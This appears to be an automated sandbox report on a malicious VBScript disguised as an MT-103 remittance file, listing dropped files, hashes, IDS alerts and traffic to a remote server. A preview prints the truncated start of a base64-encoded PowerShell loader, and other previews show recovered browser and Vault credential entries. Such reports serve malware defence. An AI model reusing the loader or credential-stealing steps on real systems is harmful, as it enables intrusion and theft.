                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryiYak7YnqqHNPN5Dlq5J:+RI+ycuZhNkYakSHNPNnqX
                                                          MD5:26227DB2BA5D86E5B698ACB313D7665B
                                                          SHA1:DE52861CFE85D549E997EF021D4FEB31F1032997
                                                          SHA-256:B7096C918F6C1D4EB51C29C679587F73DE745CFD1FACB9752B6D1A8B1BC80C02
                                                          SHA-512:A057B98A60E3703000ECB588275784CEAFAADE88BFE22D13786CC4F6488AE5F1170A2CB68579E2684A3880179D38C31E11A7DD5F44417FB73F66A87B8848FC2E
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.w.w.h.q.3.b.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.w.w.h.q.3.b.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                          C:\Users\user\AppData\Local\Temp\Champag6.dat

                                                          Download File
                                                          Process:C:\Windows\System32\wscript.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):26042
                                                          Entropy (8bit):7.478203145594058
                                                          Encrypted:false
                                                          SSDEEP:384:0b9/VINClMyMYDV7kQYCQMh2LapQscHN3ReWGIM2CZhwAicE5GVLWadfezYXa:O/SN2b/V7kO32OpaYtIeZhhiJ5GV6agj
                                                          MD5:E6C81D4CD250CD041F12F926AE2C4A57
                                                          SHA1:619F23B7E24D5337C3003A2D0F831483D30981CA
                                                          SHA-256:0EC7EB748AF7B6B2337468C11AAE5061B5CDE0FF89472539B970AD57D739350A
                                                          SHA-512:FE4324A5EB37A19A905D9D3C2A3BEA1F0356B924FF69FF4CFB70769A5EA10EC482EAC753E6F895835783C43BCE38A46C2494B9795DEDF1DEDEC0EE1F1103B23F
                                                          Malicious:false
                                                          Preview:......h.._..4$&K...4$....Z.._1..4.XO.j....9.u.W..........jX...7.R.5bL5^.Hn......f ...l....c.).n..gle...8....}..(..5b...\.-.F.B....Y.-2..H....g7...b..W-Rv'.}aD[.;.PD.q..Y...y...G./w~..i.{?m..#!...C.V....wF..^K%..I..=...4.X.9..H.L............a|4..<.m..+...C(CG.....S..D.~.....a[T..'"..o.$k....30.yY.V..L.{@U...&m..fF......&YO.jXO..XO.j...-.b.:O.....R....,GLj....-.cy.O.....jX..+!-..?\d....vM........7.YO.....j...jXO...O.j.(..2.j XO..xN.j...jX'S])..F|..b..N.I%..K.3Rw.....j.....S0.f.#....j.....S0W.L.....j..BjXOc.9O.2...hXO....?KZO..Y.?.XO.....j...b..^....bY.$...b..x..;.b..l....kXO0,..;.#....H8Q.0.3.`....%N.j0...u.N#$...{.>..L.\k.....+}....S.jX.......lTK..!....M/x....vZO..|E..0..I..N.....{..J.\k.*.z.u\.....jX.r;&X...._..S:u(Xa%....N.j0...f'....^|.!.*.N".X..{....<.7..o0?R3..N..}..{../.4.tk`....@$....8.jX..la....y.....@...v....7.YO.....j.../..j...jX..(XO..N.j.#7...|! .......L=..R<..ZkXOb..O.3.......6m.n.z.k..............jX...XO..w..j.....;....jX..VYO...S

                                                          C:\Users\user\AppData\Local\Temp\DB1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.792852251086831
                                                          Encrypted:false
                                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\RES4377.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
                                                          Category:dropped
                                                          Size (bytes):1340
                                                          Entropy (8bit):4.0119507513597545
                                                          Encrypted:false
                                                          SSDEEP:24:HZMK9ocaIr+aHqhKcjmfwI+ycuZhNkYakSHNPNnq9ed:5GZ47gK2mo1ulra33q9+
                                                          MD5:FF80A5DA283C4EA407A85AEBC4B2C080
                                                          SHA1:B09FE79EB4E29E879ECBEDE48A5B3B7E9D32804C
                                                          SHA-256:62CC0D24D893E96FA9EEFBF89A41BC01CC595CC6F820EBC1DE5A97B3C4D199B5
                                                          SHA-512:BD46D57F87D4E545E7FE17AC355927C5C44D3E39BA8D28FF9C12E36E41B7CA2DC072A7FF130603C73076865563B1A930E220954B9D12FF75FC9194FD49CB6C11
                                                          Malicious:false
                                                          Preview:L...\:.a.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........V....c:\Users\user\AppData\Local\Temp\5wwhq3bl\CSCEED551C9B69E4D3BACB27851B833AAE.TMP.................&"}..]......f[..........7.......C:\Users\user\AppData\Local\Temp\RES4377.tmp.-.<...................'...Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.w.w.h.q.3.b.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jebmlly.2vw.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview:1

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcpbiel0.fg2.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview:1

                                                          C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogim.jpeg

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                          Category:dropped
                                                          Size (bytes):101725
                                                          Entropy (8bit):7.908669144075115
                                                          Encrypted:false
                                                          SSDEEP:3072:XEpBGIWNqOGKsPdHGsLICjxuYvJokkmXrQkUX:X2BGvIOuPIsLIuGkg
                                                          MD5:6E26A569A41BD8DA75AF5D77EBF65F9A
                                                          SHA1:B7D087B2414DE96183EF16A5C3D3F290CF05F135
                                                          SHA-256:09FB51AB270489B485CDCFA33C63F860C22EB16FBE2CEAA5D019C2540C884889
                                                          SHA-512:A7E834DE38BE082116DCCCBBEFC5ED73814F04323C39DF2EA13DFF297D25C184DC868D68DB583FE95B42E27A9DB3F7F15F9CEC3519DF5B993B28FC35EA792B86
                                                          Malicious:false
                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(..V.5.?......x...1.,,..6.$-......*d.U....yM-}5.....<p...F....$...3..........._.Ug..i..=..^8.Gi5..

                                                          C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogrg.ini

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):38
                                                          Entropy (8bit):2.7883088224543333
                                                          Encrypted:false
                                                          SSDEEP:3:rFGQJhIl:RGQPY
                                                          MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                                          SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                                          SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                                          SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                                          Malicious:false
                                                          Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

                                                          C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogri.ini

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):40
                                                          Entropy (8bit):2.8420918598895937
                                                          Encrypted:false
                                                          SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                                          MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                                          SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                                          SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                                          SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                                          Malicious:true
                                                          Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

                                                          C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogrv.ini

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):210
                                                          Entropy (8bit):3.487108190618468
                                                          Encrypted:false
                                                          SSDEEP:6:tGQPYlIaExGNlGcQga3Of9y96GO4SHrvdEoY:MlIaExGNYvOI6x4SHPY
                                                          MD5:A2EFAEE8C676F08EC79B084C7934D4B7
                                                          SHA1:4668B7AB8A68C94E0D46C08AC85122D0F0045B25
                                                          SHA-256:FC319E560DD8A2254CEE9E666E558EC921F732907AB7BC3C606B426E28B3094F
                                                          SHA-512:D8E0D4CBA15EE4103969EE25283CF9914DBBB86A36C881FA4B41FB5242826CAB23E9F737FC1CEED01D4110A6917AA2028A77EF6488AB9B4B51A08365ABFE7609
                                                          Malicious:true
                                                          Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.x.m.f.r.q.k.f.m.s.v.m.p.t.n.....A.u.t.:.......P.a.s.s.:.......

                                                          C:\Users\user\Documents\20220124\PowerShell_transcript.284992.XtWh3q5P.20220124154518.txt

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):11519
                                                          Entropy (8bit):5.143130342855331
                                                          Encrypted:false
                                                          SSDEEP:192:Q7nNk6G0TjovN5sap4C7ugY/zdEr4mgMae/ukyhYGYeFvHPYkrouXstBpsE98d76:QKjKjgN5sav7qrdEr7YeDyhppvlrP8vF
                                                          MD5:3BE93613741C284F9F4DA58A4ADB9EDF
                                                          SHA1:49BFD0ABCDC4504A24F5BD7B69460DD61DED1154
                                                          SHA-256:108E72C5D15B0FFACF3EFA681C311E811F04ACCC06092DB6BAD3CD27098AC47C
                                                          SHA-512:58E9686D0D3E383CBC2D10A9F1D493AC2689A03DBBA4DD394737C61A22C3A956041D9AAE7C48F75FA4D02CD4F0822B7982A5A03D4443DE6D4DD3D99C12499ABB
                                                          Malicious:false
                                                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220124154602..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB

                                                          Static File Info

                                                          General

                                                          File type:ASCII text, with CRLF line terminators
                                                          Entropy (8bit):5.047125393175551
                                                          TrID:
                                                          • Visual Basic Script (13500/0) 100.00%
                                                          File name:Remittance Information (MT-103).vbs
                                                          File size:82341
                                                          MD5:d693624e3d9614a0dc9cf5a5cd1bb8ef
                                                          SHA1:9c50c26e8b2f9c9acfa3192385df88d3144f351c
                                                          SHA256:dcc73a1351b6b79d48f7b42a96edfb142ffe46f896e1ab9f412a615b1edd7c9b
                                                          SHA512:b9bf3919fa3c105386ccb06da796d99c9f0100d24745a42989740bb1b22419f904a254b6c7542a10f90e2f7ba26dc887471f5de87d504644192abfcb7f364e17
                                                          SSDEEP:1536:bfNRWSaRCjFp9onPdFAgTx00Y2uUaGA4MGymjgeIFJH4t:j/HlE5oYyEI3H4t
                                                          File Content Preview:'genkaldels Unmewingb9 Neuronde6 Krop3 Barberi misre frim UNAC HYLEPI MALTNIN GRAD HOLOSY Bruinshu demul INGIVEEU POSTNATEN VINDENSUND Kurdait3 THOMSONANT Subrules BRUGSGA Usselhed Fakt Waughtsfo Udmugning NONPRO NONDEFER MUDDERGRFT bondsla Bros europapa

                                                          File Icon

                                                          Icon Hash:e8d69ece869a9ec4

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          01/24/22-15:45:05.319433ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:09.319860ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:13.320120ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:17.321090ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:21.322184ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:25.343200ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:29.327724ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:33.321895ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:37.328408ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:41.322749ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:45.326508ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:49.324004ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:53.323811ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:45:57.323856ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:01.545297ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:05.324198ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:09.328620ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:13.329013ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:17.357104ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:21.326159ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:25.336237ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:29.327191ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:33.343464ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:37.350588ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:41.331268ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:45.326212ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:49.323587ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:53.340663ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:46:57.814376ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:01.352016ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:05.338893ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:09.349419ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:13.380918ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:17.338132ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:21.337460ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:25.338219ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:29.337820ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:33.484615ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:37.338676ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:41.344425ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:45.339055ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:49.339820ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:53.340176ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:47:57.342249ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:48:01.341743ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:48:05.341087ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:48:09.349651ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:48:13.345614ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:48:17.341902ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:48:21.342663ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:48:25.412694ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:48:29.343120ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:48:33.343558ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:48:37.344112ICMP384ICMP PING192.168.2.68.238.85.254
                                                          01/24/22-15:48:41.344340ICMP384ICMP PING192.168.2.68.238.85.254

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 24, 2022 15:47:31.147563934 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:31.147627115 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:31.147788048 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:31.371057987 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:31.371093035 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:31.732136965 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:31.732340097 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.133904934 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.133934975 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.134373903 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.134435892 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.140256882 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.181874037 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.310556889 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.310682058 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.479672909 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.479692936 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.479748964 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.479831934 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.479854107 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.479876995 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.479881048 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.479902029 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.479907036 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.479918003 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.479931116 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.479953051 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.479957104 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.479986906 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.480015993 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.649542093 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.649591923 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.649642944 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.649660110 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.649696112 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.649699926 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.649727106 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.649732113 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.649744987 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.649792910 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.649832010 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.650216103 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.650253057 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.650304079 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.650310040 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.650360107 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.818890095 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.818928003 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819025993 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.819046021 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819075108 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819077969 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.819101095 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.819107056 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819124937 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819149971 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.819155931 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819205999 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.819238901 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819272041 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819299936 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.819303989 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819333076 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.819363117 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.819464922 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819499016 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819534063 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.819540024 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819600105 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.819808006 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819847107 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819890022 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.819897890 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819936037 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.819952011 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.819983006 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.820009947 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.820015907 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.820045948 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.820075989 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.820169926 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.820219994 CET44349820151.106.117.33192.168.2.6
                                                          Jan 24, 2022 15:47:32.820240974 CET49820443192.168.2.6151.106.117.33
                                                          Jan 24, 2022 15:47:32.820246935 CET44349820151.106.117.33192.168.2.6
